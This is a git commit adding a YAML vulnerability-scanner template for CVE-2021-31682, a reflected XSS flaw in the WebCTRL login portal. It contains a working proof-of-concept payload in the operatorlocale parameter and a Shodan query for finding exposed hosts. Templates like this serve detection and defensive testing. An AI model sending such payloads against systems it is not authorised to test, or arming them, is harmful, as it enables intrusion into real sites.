Create CVE-2021-31682.yaml

The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
patch-1
GwanYeong Kim 2021-10-30 19:04:42 +09:00
parent 7e27db0348
commit 43629d5f49
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: CVE-2021-31682
info:
name: WebCTRL OEM - Reflected XSS
author: gy741,dhiyaneshDk
severity: medium
description: The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-31682
- https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-31682
cwe-id: CWE-79
tags: cve,cve2021,webctrl,xss
metadata:
shodan-query: 'html:"/_common/lvl5/dologin.jsp"'
requests:
- method: GET
path:
- '{{BaseURL}}/index.jsp?operatorlocale=en/%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%20'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header